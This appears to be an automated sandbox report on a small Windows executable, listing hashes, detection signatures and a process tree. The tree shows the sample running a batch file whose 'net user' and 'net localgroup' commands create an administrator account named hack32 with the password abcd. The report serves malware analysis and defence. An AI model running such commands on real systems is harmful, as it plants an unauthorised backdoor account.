3d3f357e4ad24e91c3e7bf4d93357b4aba1e31c23829eb1b7f434676de89862e

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
28/04/2024, 22:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe
Size

120KB
MD5

0636ca1a0acb3e040b06234b31ac1d7b
SHA1

48a9a582f86312f5ad41ee4112e765fcdb9c6ce0
SHA256

3d3f357e4ad24e91c3e7bf4d93357b4aba1e31c23829eb1b7f434676de89862e
SHA512

616ef9833e03c5c72e6328b16c7053ed1064adef771e4cf0092c60b8aee27c86a1e7cb3a069dec017e9ba4284ba17b9c9e88acf485c7ed8affaedb27afe84569
SSDEEP

3072:4V3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPdL:Vt5hBPi0BW69hd1MMdxPe9N9uA069TBB

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2160	2084	0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2160	2084	0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe	28
PID 2084 wrote to memory of 2160	2084	0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe	28
PID 2160 wrote to memory of 1744	2160	cmd.exe	30
PID 2160 wrote to memory of 1744	2160	cmd.exe	30
PID 2160 wrote to memory of 1744	2160	cmd.exe	30
PID 1744 wrote to memory of 2540	1744	net.exe	31
PID 1744 wrote to memory of 2540	1744	net.exe	31
PID 1744 wrote to memory of 2540	1744	net.exe	31
PID 2160 wrote to memory of 1580	2160	cmd.exe	32
PID 2160 wrote to memory of 1580	2160	cmd.exe	32
PID 2160 wrote to memory of 1580	2160	cmd.exe	32
PID 1580 wrote to memory of 2592	1580	net.exe	33
PID 1580 wrote to memory of 2592	1580	net.exe	33
PID 1580 wrote to memory of 2592	1580	net.exe	33
PID 2160 wrote to memory of 2640	2160	cmd.exe	34
PID 2160 wrote to memory of 2640	2160	cmd.exe	34
PID 2160 wrote to memory of 2640	2160	cmd.exe	34
PID 2640 wrote to memory of 2712	2640	net.exe	35
PID 2640 wrote to memory of 2712	2640	net.exe	35
PID 2640 wrote to memory of 2712	2640	net.exe	35

C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E05.tmp\E06.tmp\E07.bat C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\system32\net.exe
    net user hack32 /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user hack32 /add
      4⤵
      PID:2540
- - C:\Windows\system32\net.exe
    net localgroup administrateurs hack32 /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrateurs hack32 /add
      4⤵
      PID:2592
- - C:\Windows\system32\net.exe
    net user hack32 abcd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user hack32 abcd
      4⤵
      PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\E05.tmp\E06.tmp\E07.bat

Filesize
97B

MD5
ff8f2a3d62844ae2cbd5fe4e8d0c6a57

SHA1
87d5b055c1fb58c4922d40895c9960181255775b

SHA256
c9c8d929834a7b24149b93e53c5b3b295580bc7e2866314281e59e91d68e7293

SHA512
71fdd1dcd93120a38518b532173728ebd8b98ae2a9856d84301ba61a3f324fae1a8bfbc3ef6713ecb44093aee010b448a69282ca015caba900a6b585cb74d3f0

Download Submit